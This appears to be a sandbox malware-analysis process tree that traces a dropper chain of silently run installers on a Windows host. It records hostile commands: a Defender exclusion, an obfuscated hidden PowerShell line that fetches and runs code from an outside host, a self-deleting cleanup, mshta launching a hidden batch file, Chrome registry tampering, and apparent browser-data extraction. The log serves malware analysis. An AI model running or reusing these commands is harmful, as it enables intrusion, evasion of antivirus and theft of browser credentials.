C:\Users\Admin\AppData\Local\Temp\gf43fkbd.swn\setup.exe /8-2222
6⤵
PID:5852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-Sky"
7⤵
PID:5996

C:\Program Files (x86)\Misty-Sky\7za.exe
"C:\Program Files (x86)\Misty-Sky\7za.exe" e -p154.61.71.51 winamp-plugins.7z
7⤵
PID:5504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Misty-Sky\setup.exe" -map "C:\Program Files (x86)\Misty-Sky\WinmonProcessMonitor.sys""
7⤵
PID:5376

C:\Program Files (x86)\Misty-Sky\setup.exe
"C:\Program Files (x86)\Misty-Sky\setup.exe" -map "C:\Program Files (x86)\Misty-Sky\WinmonProcessMonitor.sys"
8⤵
PID:4980

C:\Program Files (x86)\Misty-Sky\7za.exe
"C:\Program Files (x86)\Misty-Sky\7za.exe" e -p154.61.71.51 winamp.7z
7⤵
PID:5216

C:\Program Files (x86)\Misty-Sky\setup.exe
"C:\Program Files (x86)\Misty-Sky\setup.exe" /8-2222
7⤵
PID:6776

C:\Program Files (x86)\Misty-Sky\setup.exe
"C:\Program Files (x86)\Misty-Sky\setup.exe" /8-2222
8⤵
PID:4652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spa3dq5d.xwc\MultitimerFour.exe & exit
5⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\spa3dq5d.xwc\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\spa3dq5d.xwc\MultitimerFour.exe
6⤵
PID:2500

C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
7⤵
PID:5036

C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe" 1 3.1615014977.60432c41a19cc 104
8⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe" 2 3.1615014977.60432c41a19cc
9⤵
PID:3536

C:\Users\Admin\AppData\Local\Temp\ilvtxsnctbv\1epgm04ajqq.exe
"C:\Users\Admin\AppData\Local\Temp\ilvtxsnctbv\1epgm04ajqq.exe" /VERYSILENT
10⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\is-SOE8K.tmp\1epgm04ajqq.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SOE8K.tmp\1epgm04ajqq.tmp" /SL5="$30378,870426,780800,C:\Users\Admin\AppData\Local\Temp\ilvtxsnctbv\1epgm04ajqq.exe" /VERYSILENT
11⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\is-D1EJA.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-D1EJA.tmp\winlthst.exe" test1 test1
12⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\cAXWVPjtP.exe
"C:\Users\Admin\AppData\Local\Temp\cAXWVPjtP.exe"
13⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im cAXWVPjtP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\cAXWVPjtP.exe" & del C:\ProgramData\*.dll & exit
14⤵
PID:6464

C:\Windows\SysWOW64\taskkill.exe
taskkill /im cAXWVPjtP.exe /f
15⤵
- Kills process with taskkill
PID:4736

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
15⤵
- Delays execution with timeout.exe
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
13⤵
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
14⤵
PID:7836

C:\Users\Admin\AppData\Local\Temp\zecjjrjtdtc\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\zecjjrjtdtc\safebits.exe" /S /pubid=1 /subid=451
10⤵
PID:5720

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\zecjjrjtdtc\safebits.exe
11⤵
PID:1768

C:\Users\Admin\AppData\Local\Temp\ohvftwo31pj\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\ohvftwo31pj\askinstall24.exe"
10⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
11⤵
PID:6392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
12⤵
- Kills process with taskkill
PID:7124

C:\Users\Admin\AppData\Local\Temp\zzqokg3bmo5\ajp2h4a1gsl.exe
"C:\Users\Admin\AppData\Local\Temp\zzqokg3bmo5\ajp2h4a1gsl.exe" testparams
10⤵
PID:3076

C:\Users\Admin\AppData\Roaming\501nrhzmrs2\flfroysdezm.exe
"C:\Users\Admin\AppData\Roaming\501nrhzmrs2\flfroysdezm.exe" /VERYSILENT /p=testparams
11⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\is-ATRND.tmp\flfroysdezm.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ATRND.tmp\flfroysdezm.tmp" /SL5="$2045C,404973,58368,C:\Users\Admin\AppData\Roaming\501nrhzmrs2\flfroysdezm.exe" /VERYSILENT /p=testparams
12⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\v1pxyzxpk4h\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\v1pxyzxpk4h\Setup3310.exe" /Verysilent /subid=577
10⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\is-93OC7.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-93OC7.tmp\Setup3310.tmp" /SL5="$30398,802346,56832,C:\Users\Admin\AppData\Local\Temp\v1pxyzxpk4h\Setup3310.exe" /Verysilent /subid=577
11⤵
PID:5296

C:\Users\Admin\AppData\Local\Temp\is-JP5V6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JP5V6.tmp\Setup.exe" /Verysilent
12⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\is-MDGBD.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MDGBD.tmp\Setup.tmp" /SL5="$20574,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-JP5V6.tmp\Setup.exe" /Verysilent
13⤵
PID:4168

C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\ProPlugin.exe" /Verysilent
14⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\is-AI047.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AI047.tmp\ProPlugin.tmp" /SL5="$204FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\ProPlugin.exe" /Verysilent
15⤵
PID:6980

C:\Users\Admin\AppData\Local\Temp\is-3I6IM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3I6IM.tmp\Setup.exe"
16⤵
PID:6372

C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
17⤵
PID:3948

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
18⤵
- Kills process with taskkill
PID:6484

C:\Windows\regedit.exe
regedit /s chrome.reg
18⤵
- Runs .reg file with regedit
PID:3296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
18⤵
PID:4700

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
19⤵
PID:7428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"
20⤵
PID:7520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
21⤵
PID:7884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ff8dae16e00,0x7ff8dae16e10,0x7ff8dae16e20
22⤵
PID:7900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1636 /prefetch:8
22⤵
PID:6676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:2
22⤵
PID:7152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
22⤵
PID:7340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:1
22⤵
PID:6180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
22⤵
PID:2568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
22⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
22⤵
PID:904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
22⤵
PID:1172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:8
22⤵
PID:7352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
22⤵
PID:7236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:8
22⤵
PID:2032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
22⤵
PID:7684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 /prefetch:8
22⤵
PID:7736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4392 /prefetch:8
22⤵
PID:7352

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
22⤵
PID:6604

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a5737740,0x7ff6a5737750,0x7ff6a5737760
23⤵
PID:5372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:8
22⤵
PID:5968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:8
22⤵
PID:2560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:8
22⤵
PID:6252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3188 /prefetch:8
22⤵
PID:7668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:8
22⤵
PID:7472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3504 /prefetch:8
22⤵
PID:7188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4556 /prefetch:8
22⤵
PID:3580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:8
22⤵
PID:1064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8
22⤵
PID:3928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:8
22⤵
PID:204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:8
22⤵
PID:2604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8
22⤵
PID:7532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:8
22⤵
PID:3060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=784 /prefetch:8
22⤵
PID:6732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=956 /prefetch:8
22⤵
PID:4812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:8
22⤵
PID:2752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
22⤵
PID:6296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:8
22⤵
PID:7740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:8
22⤵
PID:7912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
22⤵
PID:7724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4440 /prefetch:8
22⤵
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1440 /prefetch:8
22⤵
PID:1392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1016 /prefetch:1
22⤵
PID:7156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:8
22⤵
PID:7668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3532 /prefetch:8
22⤵
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5616 /prefetch:8
22⤵
PID:8220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3428 /prefetch:8
22⤵
PID:8328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=844 /prefetch:8
22⤵
PID:8468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:8
22⤵
PID:8568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:8
22⤵
PID:8736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:8
22⤵
PID:8908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2356 /prefetch:1
22⤵
PID:9032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3916 /prefetch:8
22⤵
PID:9060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:8
22⤵
PID:9200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
22⤵
PID:8264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:8
22⤵
PID:8324

C:\Windows\regedit.exe
regedit /s chrome-set.reg
18⤵
- Runs .reg file with regedit
PID:7600

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b firefox
18⤵
PID:556

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b chrome
18⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b edge
18⤵
PID:8012

C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\PictureLAb.exe" /Verysilent
14⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\is-PTDL0.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PTDL0.tmp\PictureLAb.tmp" /SL5="$304FC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\PictureLAb.exe" /Verysilent
15⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\is-022MK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-022MK.tmp\Setup.exe" /VERYSILENT
16⤵
PID:3624

C:\Users\Admin\AppData\Local\Temp\is-MLVCQ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MLVCQ.tmp\Setup.tmp" /SL5="$6057C,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-022MK.tmp\Setup.exe" /VERYSILENT
17⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\is-PB4DJ.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-PB4DJ.tmp\kkkk.exe" /S /UID=lab214
18⤵
PID:7236

